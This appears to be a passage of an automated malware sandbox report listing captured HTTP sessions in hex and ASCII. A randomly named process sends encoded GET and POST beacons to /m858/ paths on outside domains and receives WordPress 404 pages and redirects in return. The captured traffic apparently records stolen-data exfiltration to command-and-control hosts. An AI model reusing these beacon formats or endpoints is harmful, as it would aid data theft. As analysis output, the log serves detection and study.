8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f5 ec 48 a6 fa
                                                                                                                      Data Ascii: 7f7N6+*VI'Q=QXwhE.UJfR=18s2^NRuJ[f)g;,Ala&H~d8RZzXbFjb]!yv74#HAze)A8hH-j<H?UQ+o\WI69|[Hqx_f??~@57|>00[:X8yg0|$mGwVgS%w6=]gLH*_u$Hg}Y>Ykn'.?INtoY"[Iz.Q(-.3hx~a$C;ZKj&$h~<_Y8;?P1QkjeA?e++X[tZS$-Nn=}@"K]zuuozF7&5mY}Z8N)'3DrMw^_!O:icVB1y8=axgq2N}#jpZK;CT04mkS,Rzj/gq>n]X5xrpKFX(8<XJZ`gt$co2jm6N0H
                                                                                                                      Dec 7, 2023 13:42:51.943794966 CET1186INData Raw: be d1 25 c9 b4 f7 c9 26 ec 48 36 5c 08 2e be 01 ab 72 08 ab 5d ae 1d c9 86 4b 63 d4 65 ec 37 e0 66 6f d6 40 40 d3 91 4c 0f 02 05 9e cd e0 b6 d9 2e 7e 8b 44 b3 f9 d3 69 82 e4 58 ae ba 55 8d a3 7b 16 d5 dc 63 e8 48 36 e8 fe ea 1a 76 9c 12 8c 01 71
                                                                                                                      Data Ascii: %&H6\.r]Kce7fo@@L.~DiXU{cH6vqHv+A~~\3#Y?nK,aG8ycP.L*PyYi{u)*a_0G^UTy"/NY+')2B0vudW(,1(7eAEUQ
                                                                                                                      Dec 7, 2023 13:42:51.946788073 CET1286INData Raw: 37 37 33 0d 0a 28 0a 01 40 ee f7 ba fa 76 7f be 38 7f bc 36 98 a8 ab 5b da 95 5a 08 0c 11 25 0c c7 90 c4 ac ef ee 5b 7b 7d 3e 11 2e 3e ca c7 c5 c6 e9 81 0d de a5 44 3c b3 77 5c 20 56 00 a4 90 9c 01 22 63 fb fc 7e 57 f9 23 64 dd 17 5a f6 31 54 db
                                                                                                                      Data Ascii: 773(@v86[Z%[{}>.>D<w\ V"c~W#dZ1Tl>i '-B.+y_@#$2Y0r)3O5s,l%KYN8+?"x=B| !yJ@D8l]C}9y`3i)
                                                                                                                      Dec 7, 2023 13:42:51.946813107 CET628INData Raw: 53 e9 0f 99 85 51 13 d5 fe 42 1a 43 ec 69 11 77 5f 65 12 5c 97 52 25 ce a8 d4 51 c5 50 9e b9 40 cb 76 41 d5 a2 8c ce 74 98 00 a9 20 eb 7d 4b a3 4e 25 61 48 8b 73 61 48 b7 0d 86 2c ff 69 7c 34 96 03 bd 17 2b 30 a4 d5 a2 7c 08 31 31 2a 2b 68 19 93
                                                                                                                      Data Ascii: SQBCiw_e\R%QP@vAt }KN%aHsaH,i|4+0|11*+h1]IEuzGZb)1%Jb!V!#d%55XSi{jgz66(!"XND TqDSKZg&8|1?0=,AD Fm5yD"4T9nD
                                                                                                                      Dec 7, 2023 13:42:51.949001074 CET1155INData Raw: 34 37 63 0d 0a 30 1f 01 40 fe e6 ac af b1 a9 de 70 e5 1f 49 62 88 3f 84 54 73 bb e8 32 87 c0 08 ea fe ff c7 5e 00 29 e3 a4 1b 6f 19 f1 23 7b 6d c3 8d 37 ac 32 1f 8e 86 69 f0 eb f8 b0 04 07 24 b3 31 d4 fa 7b e8 0e e7 44 b0 79 00 4c 19 ca d0 10 8f
                                                                                                                      Data Ascii: 47c0@pIb?Ts2^)o#{m72i$1{DyL%CZ3$g`x,8C0|#fg5#7aNj_=Z-[=b#kv=TxRzNmv34V=G+3fc:+?=~#<Rm]l
                                                                                                                      Dec 7, 2023 13:42:51.965204954 CET1286INData Raw: 36 38 30 0d 0a 38 0e 01 40 ee 6d 93 fe 0c 97 d3 ec ac 68 d0 b4 0e 2b 62 df fb d2 12 20 bf 21 93 67 95 fb 3f 44 9f 87 a3 b4 c0 12 0b d1 ad cc 31 ee fe ff 19 6b da a0 74 2c 5e 80 05 8b 78 82 c5 22 cd 89 c5 8a f7 71 d8 f3 ff 3e 30 9a 94 44 b2 67 99
                                                                                                                      Data Ascii: 6808@mh+b !g?D1kt,^x"q>0Dg-XI>A `i/1;RJ2V@;/=~;@@Pl&NN>@l!e'H3Eop|[N@t$a5#1UmTx
                                                                                                                      Dec 7, 2023 13:42:51.965249062 CET385INData Raw: 90 ba de ae 5b aa 34 65 b7 3f 20 8e 20 0e 75 7f 83 e3 23 4f 73 ca d5 aa 56 84 5f 51 89 c4 16 60 6d 48 6d 5d 67 73 44 4c be 8b 49 cb 75 2e 33 72 2d 38 8d 50 be 8c 03 12 49 05 f1 41 00 6b 6e 1d 8d 52 b6 4c 31 26 a7 66 1c 42 ba 87 0f 02 a4 e7 50 ce
                                                                                                                      Data Ascii: [4e? u#OsV_Q`mHm]gsDLIu.3r-8PIAknRL1&fBP_nN?oh;TjAJZpP?G{T3Xv9:-^)]msfQ6ze:8"")C%xy#PZo7T=@gZnb,9@
                                                                                                                      Dec 7, 2023 13:42:51.972428083 CET1286INData Raw: 36 65 63 0d 0a f0 6a 01 40 7e 6d ea 9f 83 d4 c3 fd 89 8a 6e 87 67 9b 9d d1 fd c7 58 c8 01 03 6e cd 10 18 c8 ef bd 7b 6b 42 18 1e c2 9c b1 2b dc cc 24 e2 6f fe 75 c5 2e a5 14 55 27 c9 e4 e7 6f 69 a7 68 45 f6 a2 4a 77 27 24 4a 35 0f 46 62 64 f6 3b
                                                                                                                      Data Ascii: 6ecj@~mngXn{kB+$ou.U'oihEJw'$J5Fbd;P Ix,\!Bk"3;i]Vo3`-'~[xa6T(X:u767O&E x/LMJtFYj$qjPiZ]dS[RV
                                                                                                                      Dec 7, 2023 13:42:51.972466946 CET493INData Raw: cc f6 00 ee 47 30 74 18 73 d8 b3 38 29 bd f3 fc be 59 fc 85 6d af 4a 52 47 d0 fd 28 0f 43 bc a2 42 f8 96 07 c1 3e 08 96 0f 5d 09 41 30 5f 40 b4 07 50 c4 3d c5 44 2f 09 a0 88 0f 56 14 bb 81 fa 38 97 07 da 41 b8 59 8c a6 b5 93 94 78 d9 ff 40 b3 5d
                                                                                                                      Data Ascii: G0ts8)YmJRG(CB>]A0_@P=D/V8AYx@]z{Is]<Q],.KVreh (A/8FzdpIdZ|wr/@~a~|pH#_<OD9[q(:#1;VXhK
                                                                                                                      Dec 7, 2023 13:42:51.973733902 CET1286INData Raw: 38 62 32 0d 0a 98 03 01 40 2e 55 ad 5a 6a 2a 70 cf 81 f4 31 20 30 28 98 17 52 7a 79 38 20 b1 92 20 33 0d 01 05 bf 4e 65 f1 4d fb 57 fb bd 0a 15 97 89 17 75 76 e1 c4 83 5f 42 d8 db 83 00 b0 2b b2 65 54 55 64 74 65 c0 9a 9b aa da 2a d7 a9 12 95 3e
                                                                                                                      Data Ascii: 8b2@.UZj*p1 0(Rzy8 3NeMWuv_B+eTUdte*>>"J<]Ejinun{w>csnmt7k6puri#{aSz6qX0%fI)Mg1P\Y<b2Lpx#


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.849711103.210.56.141806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:42:53.053397894 CET451OUTGET /m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:42:54.192111969 CET505INHTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6
                                                                                                                      content-length: 0
                                                                                                                      date: Thu, 07 Dec 2023 12:42:53 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.849713173.231.241.132806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:42:59.599157095 CET715OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 38 51 72 38 46 50 2f 39 53 56 6d 44 41 72 67 45 33 54 46 37 38 6f 56 52 4f 75 5a 2b 53 50 4b 36 33 7a 2f 4b 30 45 31 78 62 4d 47 78 49 46 2b 6d 74 7a 32 49 2b 39 46 43 30 4e 6e 56 56 39 55 34 73 30 77 2f 76 4e 48 43 74 75 33 6b 72 69 72 42 6d 6b 54 75 4c 31 7a 6b 55 66 67 56 4e 4c 72 4e 5a 44 31 2b 6b 4c 62 76 74 39 44 31 48 79 69 47 4b 63 78 48 32 50 4d 79 51 30 77 76 36 46 4d 66 6a 65 62 53 65 68 41 66 59 75 2f 4a 34 47 7a 6d 43 32 4e 31 46 4a 72 45 59 62 48 47 55 69 54 6a 37 51 35 4b 57 44 50 56 35 31 35 5a 55 58 6d 59 48 67 3d 3d
                                                                                                                      Data Ascii: nRRpS=8Qr8FP/9SVmDArgE3TF78oVROuZ+SPK63z/K0E1xbMGxIF+mtz2I+9FC0NnVV9U4s0w/vNHCtu3krirBmkTuL1zkUfgVNLrNZD1+kLbvt9D1HyiGKcxH2PMyQ0wv6FMfjebSehAfYu/J4GzmC2N1FJrEYbHGUiTj7Q5KWDPV515ZUXmYHg==
                                                                                                                      Dec 7, 2023 13:43:02.403894901 CET418INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:42:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                                                                                      Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
                                                                                                                      Dec 7, 2023 13:43:02.462188005 CET88INData Raw: 35 32 0d 0a 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22
                                                                                                                      Data Ascii: 52UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                                                                                                      Dec 7, 2023 13:43:02.516972065 CET1286INData Raw: 31 66 34 30 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75
                                                                                                                      Data Ascii: 1f40<meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; Porous World</title><link rel='dns-prefetch' href='//porousworld.com' /><link rel="alternate" type="application/rss+xml" title="Porous World &raquo;
                                                                                                                      Dec 7, 2023 13:43:02.516997099 CET1286INData Raw: 65 2c 74 2c 6e 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 32 36 61 37 5c 75 66 65 30 66 22 2c 22 5c 75 64
                                                                                                                      Data Ascii: e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\
                                                                                                                      Dec 7, 2023 13:43:02.517035961 CET1286INData Raw: 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70
                                                                                                                      Data Ascii: w Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"unde
                                                                                                                      Dec 7, 2023 13:43:02.517107964 CET1286INData Raw: 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 7d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d
                                                                                                                      Data Ascii: -preset--font-size--medium);font-weight: normal;line-height: 1.4;}.wp-block-site-title a:where(:not(.wp-element-button)){text-decoration: none;}.wp-block-site-title a:where(:not(.wp-element-button)):hover{text-decoration: underline;}.wp-blo
                                                                                                                      Dec 7, 2023 13:43:02.517122984 CET1286INData Raw: 6d 65 6e 74 2d 62 75 74 74 6f 6e 29 29 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 7d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 61 3a 77 68 65 72 65 28 3a 6e 6f 74
                                                                                                                      Data Ascii: ment-button)):hover{text-decoration: underline;}.wp-block-navigation a:where(:not(.wp-element-button)):focus{text-decoration: underline dashed;}.wp-block-navigation a:where(:not(.wp-element-button)):active{text-decoration: none;}</style><s
                                                                                                                      Dec 7, 2023 13:43:02.517198086 CET1286INData Raw: 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 36 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61
                                                                                                                      Data Ascii: e*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}</style><style id='wp-block-paragraph-inline-css'>.is-small-text
                                                                                                                      Dec 7, 2023 13:43:02.517218113 CET1286INData Raw: 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e
                                                                                                                      Data Ascii: h:100%}.wp-block-search__label{width:100%}.wp-block-search__input{-webkit-appearance:initial;appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block
                                                                                                                      Dec 7, 2023 13:43:02.517333031 CET1286INData Raw: 76 69 6f 72 2d 65 78 70 61 6e 64 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 73 65 61 72 63 68 66 69 65 6c 64 2d 68 69 64 64 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 7b 6f
                                                                                                                      Data Ascii: vior-expand.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-wi


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.849714173.231.241.132806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:02.280976057 CET735OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 38 51 72 38 46 50 2f 39 53 56 6d 44 42 4c 51 45 37 51 74 37 6f 34 56 4f 53 2b 5a 2b 62 76 4b 2b 33 7a 6a 4b 30 46 77 30 62 66 69 78 4a 67 61 6d 38 47 43 49 39 39 46 43 73 64 6e 4d 4c 4e 55 46 73 30 38 5a 76 4e 37 43 74 75 6a 6b 72 6e 58 42 6d 54 76 74 4b 6c 7a 36 63 2f 67 58 44 72 72 4e 5a 44 31 2b 6b 4c 4f 36 74 39 37 31 45 44 53 47 4c 39 78 47 70 2f 4d 78 5a 55 77 76 2b 46 4d 6c 6a 65 62 67 65 6a 6b 35 59 74 48 4a 34 43 33 6d 43 44 74 32 4c 4a 72 47 63 62 47 73 56 33 71 36 75 78 6c 73 41 53 4c 33 6e 42 63 51 56 43 4b 4c 41 62 77 64 57 4a 33 72 6f 58 67 4c 4a 4b 45 74 42 4b 63 44 7a 63 55 3d
                                                                                                                      Data Ascii: nRRpS=8Qr8FP/9SVmDBLQE7Qt7o4VOS+Z+bvK+3zjK0Fw0bfixJgam8GCI99FCsdnMLNUFs08ZvN7CtujkrnXBmTvtKlz6c/gXDrrNZD1+kLO6t971EDSGL9xGp/MxZUwv+FMljebgejk5YtHJ4C3mCDt2LJrGcbGsV3q6uxlsASL3nBcQVCKLAbwdWJ3roXgLJKEtBKcDzcU=
                                                                                                                      Dec 7, 2023 13:43:05.393357038 CET381INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:02 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a
                                                                                                                      Data Ascii: 16<!DOCTYPE html><html
                                                                                                                      Dec 7, 2023 13:43:05.393379927 CET43INData Raw: 32 35 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                                                                                      Data Ascii: 25lang="en-US"><head><meta charset="
                                                                                                                      Dec 7, 2023 13:43:05.393467903 CET93INData Raw: 62 0d 0a 55 54 46 2d 38 22 20 2f 3e 0a 09 0d 0a 34 37 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61
                                                                                                                      Data Ascii: bUTF-8" />47<meta name="viewport" content="width=device-width, initial-scale=1" />
                                                                                                                      Dec 7, 2023 13:43:05.456545115 CET63INData Raw: 33 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 39<meta name='robots' content='max-image-preview:large' />
                                                                                                                      Dec 7, 2023 13:43:05.458424091 CET1286INData Raw: 31 66 34 30 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 50 6f 72 6f 75 73 20 57 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20
                                                                                                                      Data Ascii: 1f40<title>Page not found &#8211; Porous World</title><link rel='dns-prefetch' href='//porousworld.com' /><link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Feed" href="https://porousworld.com/feed/" /><link rel=
                                                                                                                      Dec 7, 2023 13:43:05.458472013 CET1286INData Raw: 66 5c 75 32 30 30 64 5c 75 32 36 61 37 5c 75 66 65 30 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 62 5c 75 32 36 61 37 5c 75 66 65 30 66 22 29 3f 21 31 3a 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61
                                                                                                                      Data Ascii: f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\
                                                                                                                      Dec 7, 2023 13:43:05.458542109 CET1286INData Raw: 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 29 3b 69 66 28 21 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21
                                                                                                                      Data Ascii: supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()
                                                                                                                      Dec 7, 2023 13:43:05.458580971 CET1286INData Raw: 68 74 3a 20 31 2e 34 3b 7d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 3a 77 68 65 72 65 28 3a 6e 6f 74 28 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 29 29 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20
                                                                                                                      Data Ascii: ht: 1.4;}.wp-block-site-title a:where(:not(.wp-element-button)){text-decoration: none;}.wp-block-site-title a:where(:not(.wp-element-button)):hover{text-decoration: underline;}.wp-block-site-title a:where(:not(.wp-element-button)):focus{tex
                                                                                                                      Dec 7, 2023 13:43:05.458668947 CET1286INData Raw: 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 61 3a 77 68 65 72 65 28 3a 6e 6f 74 28 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 29 29 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 20 64 61
                                                                                                                      Data Ascii: k-navigation a:where(:not(.wp-element-button)):focus{text-decoration: underline dashed;}.wp-block-navigation a:where(:not(.wp-element-button)):active{text-decoration: none;}</style><style id='wp-block-group-inline-css'>.wp-block-group{box-
                                                                                                                      Dec 7, 2023 13:43:05.458714008 CET1286INData Raw: 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 36 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65
